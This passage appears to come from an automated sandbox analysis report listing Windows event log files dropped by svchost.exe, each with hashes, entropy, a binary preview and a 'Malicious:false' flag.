                                      Preview:ElfChnk.I.......].......I.......]..............X......5......................................................................Zk........................................F...=...........................................................................................................................f...............?...........................m...................M...F.......................&.......................................!....................................................%..............................**......I.........]...............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:dBase III DBT, next free block index 1130785861, 1st item "**"
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.3095584055973708
                                      Encrypted:false
                                      SSDEEP:48:MYpWVN0rP+AQNRBEZWTENO4bnBqzoZKJzwzrtJiVLW6h2yzwzrzutzwzr:kNRNVaO8ooZKJMLALWPyMzutM
                                      MD5:0230823758ECF0A6164A39DA57264393
                                      SHA1:E11776E7093A231DF30D285590861834CB4679B5
                                      SHA-256:5258C7EBAE2882B53ABD293E9621D3CEB3723E0A42054554B97DC871D1AC4AA9
                                      SHA-512:0F9524A825C6621DB552FFA22F7E394A81586921E31579465544813325E4D855CE3CE3429D1D1E27D408413450CB63F693F62A1F25ED718A56739D65AC02ED11
                                      Malicious:false
                                      Preview:ElfChnk.....................................p..................................................................................I........................................>...=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................................................................**................e=.,............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.0818493338254933
                                      Encrypted:false
                                      SSDEEP:384:Qh/1oh1912d1U1c1Y1j1V111ad1D1Z1d1Gk1N1T171e1C1b1pv1:Q4CiC
                                      MD5:34093A5125A164E779EFDF8C6DA1CC97
                                      SHA1:ACFA485A1016B642CDF495B6FDD5DC6B644A86B7
                                      SHA-256:90263C4AFA642D516C2D41EF78A1590AC9611E4126CB98C72D68AE9A521F04E2
                                      SHA-512:13261C98D34FCFF1DE59BE840584DFE89CDA4B4B4931C093967E9C46ADC4425C5AE261B7B9FEFE5F06C795E77496E3BA9C5ED3E46F5DD94DD282970858043DF0
                                      Malicious:false
                                      Preview:ElfChnk....................................../..@1..xJ......................................................................Q..N................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F.......................&.......y...................................................................................................................**...................,............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):3.3245549932510525
                                      Encrypted:false
                                      SSDEEP:384:phHIbI0IHIjSIiI7IH7IKINIOIoIQIaIZIXII1IvIJI8IKIeIuIQIAINI5uIRIjv:paO6qJ9
                                      MD5:74621CE31109FD8EF21AE238AD5CA41B
                                      SHA1:E88731FAE414EEC2A8C5DC4F9F2DAC493E0D87F7
                                      SHA-256:9DE2458A9F451C445C6875A3D402BBA44A78733F58589A7F4CB348D005A070D7
                                      SHA-512:A7EDCF4C8D13A3F43FC8CDF4DA633B58AB56C9027E19482BF9503C7B6AA784A6CF7C85348A5A3414CB1AC821CE4AE82D7F5F5A69F147BA27A012E49D5E60C7FD
                                      Malicious:false
                                      Preview:ElfChnk.........R...............R...................4..8......................................................................&"........................................>...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..h...........@.}I.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.7673344634980999
                                      Encrypted:false
                                      SSDEEP:384:ShXIWdIxInIrvGIMImIAIQI0cIcIeIxIEIOI8I/IErIfIzI:SnmvX
                                      MD5:4CF4D6AF8864B7E5706987A3E36D8219
                                      SHA1:A1332F1CFF5AFF35F96E07FA3524CC7E2A3FA1BD
                                      SHA-256:3B97A27803B3CE901584AF79403FA799E657E44E2DC4CD5878F7FD446C294ED0
                                      SHA-512:82EF2CAB5F9C869D0FCFFC36976FBCCAE8BC36DC866D5C1B02EB4B5AD147C91D7D01BAEEE122EB1135177A0385C0960D50E82F53C03257271FC35D92E956BE86
                                      Malicious:false
                                      Preview:ElfChnk......................................!...".." _J...................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..............8.ZI.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):2.716122025324903
                                      Encrypted:false
                                      SSDEEP:768:cZ1RvmXdd6oaxmE1+oaxk1DHoaxIpT1ooaxJ1woaxU12oax61joax21Ioax718oo:exMp
                                      MD5:2F3308083029D079CD5BE99E725E9DDC
                                      SHA1:C3E45B0FA0C9E979A72AF9ECE79896A5AC409559
                                      SHA-256:4E42A9FE5331F656BCC66A80B157835D9CEE2B14BD514F3F97CF7B881F17B877
                                      SHA-512:65578E059255A28411E335509AFF44C468E8003CD63A25A3890FCF16DEC5D2033CC16971B35F9B9C3D073058DFEA9B0EC0AA37651F0E91E133C398690A19A72B
                                      Malicious:false
                                      Preview:ElfChnk..................................... .........q.........................................................................................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F.......................^...............................................................................................................&...........**..8.............xI.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):4552
                                      Entropy (8bit):3.8872614439833386
                                      Encrypted:false
                                      SSDEEP:96:DQyeYHyeLyDdyFYOkycsyggJylYr5y2k+zyE:DQyeYHyeLyDdyFYOkycsyggJylYr5y2D
                                      MD5:7FED74EB9A91882B91EB58F01040612C
                                      SHA1:13216BC1D75A8F7C99F1AA01C6688A2E771991D1
                                      SHA-256:8DB19309FAD14D7C0FC14B224AF89BB334F175B22C596FBDE08858BA5A334E17
                                      SHA-512:AE8F4B9666669EDA9C403C016F2305CBF79C393E633F9775B35DD996A742AF9F3A6CB675B108C5CEBDDBA391B1F8304D33CDEE8105991CCEB00CE80C44941049
                                      Malicious:false
                                      Preview:ElfChnk.].......g.......].......g...............(...........................................................................6.Y.................>...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................................................................**..x...e........................&...............................................................8.......P.....!........................w.3.....54........P...e........................I..~.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l.;...@\.K.f<...ZM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.o.w.e.r.S.h.e.l.l./.O.p.e.r.a.t.i.o.n.a.l......L...............x...**......f........................&...............................................................8.......P...C.
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):69280
                                      Entropy (8bit):3.083548393710768
                                      Encrypted:false
                                      SSDEEP:384:tKpK2KVKEKiKhKzhaKpwKRKtrKwKiKvuKv6KeAKpgKzkK8KDK1KIK6KcKHKkFKWM:FXj20a+RL53wp3T
                                      MD5:A69DBEA8C5639FFCFAF9132BC3509507
                                      SHA1:C5C571BCA23772EF39ED74CEAFEDF5F5C9B69488
                                      SHA-256:B12E0B5A1D6D6F1155B3A58CE953258EC5C9DD3808C30E23630116F9987FC8D6
                                      SHA-512:0BBAB38D54774A74640469195DF0D3F4724849ABC3A10D3249CAAECE3310180C3C8987FF00D20F1694F4697275E0125D24512F62974A30B5B9CFC7D6660DB889
                                      Malicious:false
                                      Preview:ElfChnk.G...............G..........................g.|2.....................................................................i..................|...........................=...........................................................................................................................f...............?...........................m...................M...F.......................' ...................W.......................c../....................................................[......................**..0...........VK................&...............................................................X.......n.....!.................VK......w.3.....m4........<............................I..~.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.u.s.h.N.o.t.i.f.i.c.a.t.i.o.n.s.-.P.l.a.t.f.o.r.m.....D@F.q..RyCM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.P.u.s.h.N.o.t.i.f.i.c.a.t.i.o.n.-.P.l.a.t.f.o.r.m./.O.p.e.r.a.t.i.o.n.a.l......;.W..........V...........*...W.i.n.d.o.w.s...S.y.s.t.e.m.T.o.a.s.t...S
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):2.1855024990303105
                                      Encrypted:false
                                      SSDEEP:384:rhr8R87L8lu8ud8y8Ce8ul8q8Mb8uu8ZTl8LL8uT8ii8s2u8u28F8WB8uGC8o86h:rbbIRCyv9YrOyUwvhZ51p0Da
                                      MD5:C647B6E8EEF0EDADC3702A934A4E4904
                                      SHA1:1BB2DDD55319DA96F787AE1688E75D32E677A4E6
                                      SHA-256:C395536BF3BAFE9AC5092408B71D50224E87C5DD4AB96BD9A159ED92D36CDDF5
                                      SHA-512:3FBDB1C4B4E065B5DA1143B1B1FB33B188006558D76AD5543D196CABCB32D5A7BFC81EE9995E5DAFC735D593619B0EC12573993D09037AF83BE6D3DCB1107551
                                      Malicious:false
                                      Preview:ElfChnk.........:...............:............k...l..F|.......................................................................[.........................................V...=...........................................................................................................................f...............?...........................m...................M...F....................6..&...........................................................................................................................**..@................,............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.9737054121668913
                                      Encrypted:false
                                      SSDEEP:384:hhBvCvPMvBUzvHxv+vXvqvHv8vSvevNvovDvuvlHvYvIv54vJvjvNv:hL/
                                      MD5:28B2EECBFF645319E0755E0AFC203CDF
                                      SHA1:3EADA3FD3ED18D6F953EEEECEDBA7D695C4FB017
                                      SHA-256:09F8E0E7A4D50D78C663194E64768E14D4F296A60F51BB07389AB8F2FEFA0D6E
                                      SHA-512:9CB6731E41A3D396ED09A7E64B748C47F1C2945C1AE1D0A25D2B3B8D3CFE676FDDC3CCD3C6DF054BB7FAE07A4D6CC09DC9AC2A9DA101C5B3B3F7A0B7D0F2966B
                                      Malicious:false
                                      Preview:ElfChnk......................................,...-..9y.]....................................................................>...................v...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................O...............................................................................**...............Z1..,............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):3.7447306595168834
                                      Encrypted:false
                                      SSDEEP:384:ZhAuVuouhuhudnuBupuVuauPu7uMuVx7/bl0Ad5h51GR5GfGtGpuWGaG0uWGKb8:ZKP7/p0Ad5hqq+4cnrVnKA
                                      MD5:372A93BFB58AE7428C6D2ABEB21151B5
                                      SHA1:8CBCFEC17135DB0381403A6E20024CA6D2210AA1
                                      SHA-256:FB39E76767959088EAA5011FF358E1921B0A76E0469F5A6B7FBA9EA022B8F075
                                      SHA-512:CDD09BA3628753BA20AEF7823057E6334E6FB2FA2955D832818ED451B02EB12F6BEA3FBBCC2D30502F6A9EB3383833B821977B7C9AEF47BB9E2AFD948B3557B5
                                      Malicious:false
                                      Preview:ElfChnk.........................................X.....z......................................................................_7.................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................................................................**...............X...,............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):2.208184281139527
                                      Encrypted:false
                                      SSDEEP:768:kVwsJrwgecf/geR1ePQedVeUkeMDceQ5eMBetePeqjVyehelCeJeNeeJeQke0:U
                                      MD5:031AE23C7E40A59438D0F127BB980EC0
                                      SHA1:19C89B301B5DEAFCA7F4C8EC7ED35E893A0A3689
                                      SHA-256:0453BBC98CFF7CAF021AB84D097CA92099651D54C308D51B5F426F67E02BF55A
                                      SHA-512:FE02365930C43201A8A0188EC7463A9D89186F952E91D2E8E750A86811ED2E8C553DEB4E0D71BDA2D9EF10F9AAAFAFD0D32C08947E7617921D7207793DB4B16A
                                      Malicious:false
                                      Preview:ElfChnk.........9...............9............n...q..}.1......................................................................*..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...................................................................................&...........*.......]...........................................**................P.,..........}.&.........}..T.NN.y..C........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):608744
                                      Entropy (8bit):4.157124122583925
                                      Encrypted:false
                                      SSDEEP:1536:cFXvrYIcKWPh+zbjzj7bjPz3P3aQqLjyXniC7sTX:cFTYIJWPh+zbjzj7bjPz3P3bKSiqa
                                      MD5:AE06158AC53E33CCFFB9DDB47BA50855
                                      SHA1:11EFF832798CD0D93D5221B4A0C310C6F64D2C38
                                      SHA-256:2897BFCA0BC0736C7FC084FDC3408067F574FC7FF883F1DFE1AC38385B3D56A2
                                      SHA-512:0E57E562AFE9A7DB2B3854923AD53C6C9A2CB710CB0CE23E8EA0ABD3C3B62447DC84713B987CE622E6EF587FC7E326AD467DB1E6B5F09613C995FBA857A066C5
                                      Malicious:false
                                      Preview:ElfChnk..4.......4.......4.......4...................U......................................................................'Z..................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................-...............................................**..(....4.......B.!..............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):4.311845408807394
                                      Encrypted:false
                                      SSDEEP:384:+gh+CD0CtCGChCrC/CeC/C6CzCeC8CrC+CRCLCwCsOCCCSCFCYCUCE2l2m2L2s2G:+g5d26OYNpgwHXx
                                      MD5:4FD9B16A4ED1A54503AF195246728D09
                                      SHA1:6294E15F46CBF21A8450E608626E76F6A95F1B89
                                      SHA-256:D62EB98BFC983EC7C3CC52668AE4499928D75F803A1F83D9BF98E9B738F39370
                                      SHA-512:BC967784FB0DA2B58F0C8A92E04F8FC4B92DFE903B49E561CA822528296EDBFE8185C4212D29BADBD670B3C3A7006B5391E3C94E99DB7916918109641FD04615
                                      Malicious:false
                                      Preview:ElfChnk.d.......{.......d.......{...........H>...?....jI........................................................................................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................................................................**..0...d.......k%(~.{............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.0662136356590293
                                      Encrypted:false
                                      SSDEEP:384:ZhaK7BnoPK7BkK7Be6K7BXK7Bm9K7BLK7BYTK7BbK7B5uK7BTK7BBK7BAK7BfhKd:ZRRHG+DSrizC0XtmkwjxrN
                                      MD5:F74FD01FC8EB1D88C35796986A301E83
                                      SHA1:087D0E5BA3B0CCF149C55ED6454F56B49AEAF093
                                      SHA-256:F63B346C1BF1AE6C797CE5AF0B87B9D00F2E9818C6F6511E27F2747FCB3B88F6
                                      SHA-512:83AE9DC6C62D4C76ACC5CADDD8811450FDD24CB950F2DFC963465A459EAE84A1E67AA8EF9042D531D640D31D7BE086DB9D9C767D55D08DC5B5E01361883B9FFE
                                      Malicious:false
                                      Preview:ElfChnk..................................... -......md......................................................................7.(|................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................................................**..............f..."-............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):4.423592768728116
                                      Encrypted:false
                                      SSDEEP:1536:9iEjRZxfK3r7ML8BFA8vVdih34RWyfGtZBAQ5OyaKvl9rHaBlZRVjBxCu+s9o5N+:9iEjRZxS3r7ML8BFA8vVdih34RWyfGt4
                                      MD5:AA45EFCC3AB7AD78D6576D80F50D8FD8
                                      SHA1:2155B7659C4391A755413E1AB43CFBB533AB3B7F
                                      SHA-256:2E74D99BA7B6054C45541CF276E92F3E952A379B58A3502C48CE3B9626C9B2C2
                                      SHA-512:8275C6F8E25CBCBB28ACAA3101DDD1AC3001C128879F4CE7ED3AB870C6F7DC5E06BDC81033E92791F5BC9C1022947A8A7164529C8EA4F78DE678A97358853466
                                      Malicious:false
                                      Preview:ElfChnk.........H...............H...............`...0......................................................................."W..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F.......................&........................................................................................@...'...................%..........**..@...........zh................&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):3.905630419870268
                                      Encrypted:false
                                      SSDEEP:768:uL8ACsRoU7keghU0fXaE79QRbdnmp/rN4yJDmOYARrir15Pp9zGwuSMO4BN1hfxx:7r5xeqh
                                      MD5:77734C2F5E96AA983ECAFE88A0A1F371
                                      SHA1:F85E939D1679B4CC1DE1885C316E01FE2A1C2AB6
                                      SHA-256:D8109DC24970E5692F2A6D9D6D0ADB3837A95623450A6287DE7C1321E265CEB4
                                      SHA-512:2BD006B2409BE5D51BA88AAEBB02F5FA6A0AC788B1F03E312CF6D62DED5A837B8AC2ADF05E4EC0A795ECE64CBADC071B3202E00146C4B25247B834B1F6ABB6C0
                                      Malicious:false
                                      Preview:ElfChnk.........#...............#...........`...0......@.......................................................................b............................................=...........................................................................................................................f...............?...........................m...................M...F....................9..%b...j......................................ed..........5h.......................6.............5m..........................**..X.............?.!-............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):2.665127487657689
                                      Encrypted:false
                                      SSDEEP:384:sh0u1uguEue2uxuuuHQuYou/TuHQquHhuH7uOuNuiuauhuHnuHXuLu4uHSZu8uDi:sxYxEg4aNKHwtXZQyF0PI4QaBh
                                      MD5:97E739C7EF97322E26C43672183BEB87
                                      SHA1:01AD80FF231309EE0A8495DE412F63F05DD1A358
                                      SHA-256:D5E540FB81B224DAD7F5EA1FBF01610F7D90921D5F083138AFAE3F8E59BEC44A
                                      SHA-512:C8C233110EFADA01E2E4A7895EA58D4DF7207722545A55A612452AA27CE75596D9854AC900539AE86D0AAAA15D34CF0DB0202CAD92A6B4CC379BA93722C45293
                                      Malicious:false
                                      Preview:ElfChnk.........L...............L...............P....p......................................................................3.Lv................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F............................]...A..............................................we...................>..................................&...........**...............O.P.,.........r .&........r ..61Q;..x{..f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.6946674006619171
                                      Encrypted:false
                                      SSDEEP:384:7hpALAdu/ZAxuwSAQAjqAtcAtyGANpA7A:7Vu/WFy
                                      MD5:CAACCB19E6BA79A513A78F4CDAB8B074
                                      SHA1:45C878074FFA87A33C0CA36921E99D17750CB68A
                                      SHA-256:BE8316CD4CBEA47A599E5375DA6979D5D6934DEFCC0EF5EBC42486C70E324113
                                      SHA-512:68CF71A2E64FFF8AD239CDBFAEB5EFBDAF8CDD555AD5B3927FA400FB0E5DCF9448E6FE7DEFA9D0BEDEDBF82CCEA2CBE4385C88538EA239FDA61B91551720D03F
                                      Malicious:false
                                      Preview:ElfChnk...............................................3r.....................................................................m_.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F.......................&.......e.......M...............................E...................................................................%.......**..P.............?...............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):3.600944857083945
                                      Encrypted:false
                                      SSDEEP:768:j9Rt6NtN1Z95JZtVdlXTDvPfg4XTnrPD7fbw6GG26CVJdhpt7V19hVR5JRNZl1ln:
                                      MD5:2ABCD283A36954064F45FEC40FC8F012
                                      SHA1:D390A734AE72ACCD6A89D85E1790A6AE6B5F4098
                                      SHA-256:018EFDCEE019E15C86F8C35758CF348E3F2ED5F7EEE651A4983AB8EB3F600F1E
                                      SHA-512:2AC9CD0B0E4BBFD199BD96C77B7A8B93D0CD19AF388BD0E100A9AE12E5C6170DE3EBC69053B1AAD0AD1A73A604A88FA58B926F421D08E3E68B662E7492C48FD0
                                      Malicious:false
                                      Preview:ElfChnk.........j...............j...........P... ...l0........................................................................................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................................................................**..............N.a.=.............&...........|.&^!$a.Q|=.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):68976
                                      Entropy (8bit):4.656966631610031
                                      Encrypted:false
